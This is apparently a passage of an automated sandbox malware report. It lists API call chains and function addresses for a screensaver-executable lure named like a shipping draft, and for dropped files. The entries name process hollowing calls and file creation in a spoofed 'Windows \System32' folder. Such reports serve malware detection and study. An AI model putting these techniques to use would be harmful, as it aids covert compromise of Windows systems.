Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	32_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	32_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	34_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	34_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC8898C NtQueryInformationToken,	34_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	34_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	34_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	34_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	34_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	34_2_00007FF70CC888C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,	36_2_0040DD85
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00401806 NtdllDefWindowProc_W,	36_2_00401806
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004018C0 NtdllDefWindowProc_W,	36_2_004018C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004016FD NtdllDefWindowProc_A,	37_2_004016FD
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004017B7 NtdllDefWindowProc_A,	37_2_004017B7

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.exe

5_2_00007FF70CC75240

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_028B81B8 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,

0_2_028B81B8

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

0_2_279567B9

Creates files inside the system directory

Source: C:\Users\Public\alpha.exe	File created: C:\Windows	Jump to behavior
Source: C:\Users\Public\alpha.exe	File created: C:\Windows \System32	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\Public\alpha.exe

File deleted: C:\Windows \System32

Detected potential crypto function

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40117194	0_2_40117194
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_4010B5C1	0_2_4010B5C1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A20C4	0_2_028A20C4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27976FEA	0_2_27976FEA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797DE9D	0_2_2797DE9D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27975E5E	0_2_27975E5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797E558	0_2_2797E558
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279774E6	0_2_279774E6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2799332B	0_2_2799332B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797E2FB	0_2_2797E2FB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279861F0	0_2_279861F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27973946	0_2_27973946
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797E0CC	0_2_2797E0CC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279778FE	0_2_279778FE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795DB62	0_2_2795DB62
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2796739D	0_2_2796739D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27967BAF	0_2_27967BAF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27966E0E	0_2_27966E0E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27967A46	0_2_27967A46
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040E800	1_2_0040E800
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040C838	1_2_0040C838
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040F1CA	1_2_0040F1CA
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_00411250	1_2_00411250
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004102D0	1_2_004102D0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040B2E7	1_2_0040B2E7
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004102F0	1_2_004102F0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004105F0	1_2_004105F0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_00410673	1_2_00410673
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004106B9	1_2_004106B9
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC77D30	5_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC85554	5_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7AA54	5_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC837D8	5_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7CE10	5_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC78DF8	5_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9D9D0	5_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC781D4	5_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CCA1538	5_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC76EE4	5_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC97F00	5_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC80A6C	5_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9EE88	5_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7E680	5_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9AA30	5_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC74A30	5_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC84224	5_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC72220	5_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7D250	5_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC79E50	5_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC77650	5_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC75240	5_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC76BE0	5_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC73410	5_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9AFBC	5_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC75B70	5_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC73F90	5_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7372C	5_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC79B50	5_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7B0D8	5_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC78510	5_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC818D4	5_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC71884	5_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC72C48	5_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC87854	5_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9AC4C	5_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC77D30	6_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC85554	6_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7AA54	6_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC837D8	6_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7CE10	6_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC78DF8	6_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9D9D0	6_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC781D4	6_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CCA1538	6_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC76EE4	6_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC97F00	6_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC80A6C	6_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9EE88	6_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7E680	6_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9AA30	6_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC74A30	6_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC84224	6_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC72220	6_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7D250	6_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC79E50	6_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC77650	6_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC75240	6_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC76BE0	6_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC73410	6_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9AFBC	6_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC75B70	6_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC73F90	6_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7372C	6_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC79B50	6_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC7B0D8	6_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC78510	6_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC818D4	6_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC71884	6_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC72C48	6_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC87854	6_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9AC4C	6_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC85554	9_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC80A6C	9_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC84224	9_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7AA54	9_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC837D8	9_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7CE10	9_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC78DF8	9_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9D9D0	9_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC781D4	9_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC77D30	9_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CCA1538	9_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC76EE4	9_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC97F00	9_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9EE88	9_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7E680	9_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9AA30	9_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC74A30	9_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC72220	9_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7D250	9_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC79E50	9_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC77650	9_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC75240	9_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC76BE0	9_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC73410	9_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9AFBC	9_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC75B70	9_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC73F90	9_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7372C	9_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC79B50	9_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC7B0D8	9_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC78510	9_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC818D4	9_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC71884	9_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC72C48	9_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC87854	9_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9AC4C	9_2_00007FF70CC9AC4C
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A36054	16_2_00007FF7E0A36054
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A3596C	16_2_00007FF7E0A3596C
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A31664	16_2_00007FF7E0A31664
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A36EC8	16_2_00007FF7E0A36EC8
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A372C0	16_2_00007FF7E0A372C0
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A367A0	16_2_00007FF7E0A367A0
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A36AE8	16_2_00007FF7E0A36AE8
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A383D8	16_2_00007FF7E0A383D8
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A34050	16_2_00007FF7E0A34050
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A35128	16_2_00007FF7E0A35128
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A34318	16_2_00007FF7E0A34318
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A39890	16_2_00007FF7E0A39890
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A37C7C	16_2_00007FF7E0A37C7C
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A37670	16_2_00007FF7E0A37670
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A32D70	16_2_00007FF7E0A32D70
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A39C74	16_2_00007FF7E0A39C74
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF91EF0	17_2_00007FF6FEF91EF0
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF97D50	17_2_00007FF6FEF97D50
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF93D60	17_2_00007FF6FEF93D60
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF91358	17_2_00007FF6FEF91358
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF9567C	17_2_00007FF6FEF9567C
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF95B8C	17_2_00007FF6FEF95B8C
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF930B0	17_2_00007FF6FEF930B0
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF95114	17_2_00007FF6FEF95114
Source: C:\Windows \System32\per.exe	Code function: 17_2_00007FF6FEF97928	17_2_00007FF6FEF97928
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC78DF8	31_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC85554	31_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7AA54	31_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC837D8	31_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC73410	31_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7CE10	31_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9D9D0	31_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC781D4	31_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC77D30	31_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CCA1538	31_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC76EE4	31_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC97F00	31_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC80A6C	31_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9EE88	31_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7E680	31_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9AA30	31_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC74A30	31_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC84224	31_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC72220	31_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7D250	31_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC79E50	31_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC77650	31_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC75240	31_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC76BE0	31_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9AFBC	31_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC75B70	31_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC73F90	31_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7372C	31_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC79B50	31_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC7B0D8	31_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC78510	31_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC818D4	31_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC71884	31_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC72C48	31_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC87854	31_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9AC4C	31_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC78DF8	32_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC85554	32_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7AA54	32_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC837D8	32_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC73410	32_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC87854	32_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7CE10	32_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9D9D0	32_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC781D4	32_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC77D30	32_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CCA1538	32_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC76EE4	32_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC97F00	32_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC80A6C	32_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9EE88	32_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7E680	32_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9AA30	32_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC74A30	32_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC84224	32_2_00007FF70CC84224
